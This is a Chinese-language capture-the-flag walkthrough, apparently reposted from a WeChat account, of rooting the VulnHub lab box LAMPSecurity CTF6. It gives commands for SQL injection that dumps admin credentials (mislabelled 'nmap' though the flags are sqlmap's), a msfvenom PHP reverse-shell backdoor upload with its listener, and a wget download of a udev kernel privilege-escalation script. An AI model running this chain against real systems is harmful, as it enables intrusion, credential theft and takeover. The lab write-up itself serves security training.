vulnhub-LAMPSecurity:CTF6

admin
admin
admin
140350
文章
117
评论
2022年7月23日17:40:52评论75 views字数 1862阅读6分12秒阅读模式

描述

本次使用靶机名为LAMPSECURITY: CTF6的ctf挑战。我们的目标是获取该靶机root shell

LAMPSecurity 项目致力于生产可用于教育信息安全专业人员和测试产品的培训和基准测试工具。请注意,还有其他夺旗练习(不仅仅是最新的)。检查 SourceForge 站点以查找其他可用的练习

靶机地址:https://www.vulnhub.com/entry/lampsecurity-ctf6,85/


网络扫描
第一步需要精确的进行识别目标

netdiscover -r eth0 -i 192.168.1.0/24

vulnhub-LAMPSecurity:CTF6

主机扫描
确认目标后 我们将使用nmap获取开放的端口以及运行的服务等信息

nmap -sV -sC -p- -oN /CTF/vulnhub/ctf6/nmap 192.168.1.113

vulnhub-LAMPSecurity:CTF6

网页信息收集

按照个人习惯 首先从80(http)入手,能不能找到切入点,现在使用浏览器导航到web页面。


vulnhub-LAMPSecurity:CTF6 
可以看到 发布者用户名为:admin 这是对我们非常有用的信息,接下来我们继续浏览其他页面 尝试获取更多有用的信息。

vulnhub-LAMPSecurity:CTF6

在点击文章后 可以在后缀看到我们熟悉的:id  那么毫无疑问,在最后输入' 尝试是否存在注入。

vulnhub-LAMPSecurity:CTF6

NMAP注入
直接报错 接下进行nmap一把梭

nmap -u "http://192.168.1.113/?id=4" --dbs --batch

vulnhub-LAMPSecurity:CTF6

得到数据库列表 在这里“cms”引起了我的注意 我们继续猜表

nmap -u "http://192.168.1.113/?id=4"  -D cms --tables --batch

vulnhub-LAMPSecurity:CTF6

得到了“user”表 继续

nmap -u "http://192.168.1.113/?id=4"  -D cms -T user --dump --batch

vulnhub-LAMPSecurity:CTF6

如上图,发现了账号密码,这里猜测是后台登录用户名和密码,在首页我们也发现了登录页面,现在我们点击log in按钮进行尝试登录。

vulnhub-LAMPSecurity:CTF6

很奈斯 在后台管理页面 我们又发现了 Add Event选项,那么我们接下来尝试上传PHP后门
在这里我们将使用 msfvenom 创建后门 然后将 shell.php 文件上传到网站上 。首先我们进行创建

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.114 lport=4444

vulnhub-LAMPSecurity:CTF6

复制后新建shell.php文件进行粘贴,通过下图进行上传。

vulnhub-LAMPSecurity:CTF6

点击 Add event后我们就成功上传了恶意文件。现在我们使用msfconsole或者netcat 来获取会话。

msfconsoleuse exploit/multi/handlerset payload php/meterpreter/reverse_tcpset lhost 192.168.1.114set lport 4444

vulnhub-LAMPSecurity:CTF6


在输入“run”后按回车运行并同时返回到浏览器去访问我们刚才上传的后门文件。

vulnhub-LAMPSecurity:CTF6

提权
我们成功的建立了一个会话,我们在终端中运行“sysinfo”来查找与内核版本及其体系结构相关的一些信息。

vulnhub-LAMPSecurity:CTF6

内核版本是2.6.18-92.el5
接下来就是利用自己的时间在网络中查找相关的漏洞,在大量的查找与使用内核提权后,我们发现此内核版本易受udev攻击,也找到了适合我们使用的攻击脚本,那么现在我们将使用8478.sh脚本来获取root访问权限

vulnhub-LAMPSecurity:CTF6

现在我们需要把攻击代码上传到靶机上,我们开启http服务进行上传。

vulnhub-LAMPSecurity:CTF6

现在我们需要在meterpreter会话中放置一个shell,因为不能直接进行权限提升,为了更高级的shell,我们使用python的pty模块。

vulnhub-LAMPSecurity:CTF6


现在我们有了一个shell,可以尝试更多的方法来获取root权限
现在我们从本机中下载脚本代码文件。因为时间原因我回到自己房间继续操作 所以ip地址换了。

wget http://192.168.0.104:8000/8478.sh

vulnhub-LAMPSecurity:CTF6

现在使用chmod命令将权限更改为可执行文件

vulnhub-LAMPSecurity:CTF6

可以看到 这里运行以后直接报错,然后我在网上找到了此错误的解决方法,使用以下命令进行解决。

sed -i -e 's/r$//' 8478.sh

vulnhub-LAMPSecurity:CTF6

该漏洞利用程序需要udev进程的PID,这样才能使代码正常运行,所以我们用以下命令找到合适的PID供我们使用。

cat /proc/net/netlink

vulnhub-LAMPSecurity:CTF6

好 我们继续 搭配着PID 568 再次运行脚本

vulnhub-LAMPSecurity:CTF6

到这里,我们就获得了root权限
在这里建议大家尝试一些其他的方法
点击下方公众号获取更多内容

原文始发于微信公众号(剑客江湖):vulnhub-LAMPSecurity:CTF6

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月23日17:40:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub-LAMPSecurity:CTF6https://cn-sec.com/archives/1194636.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息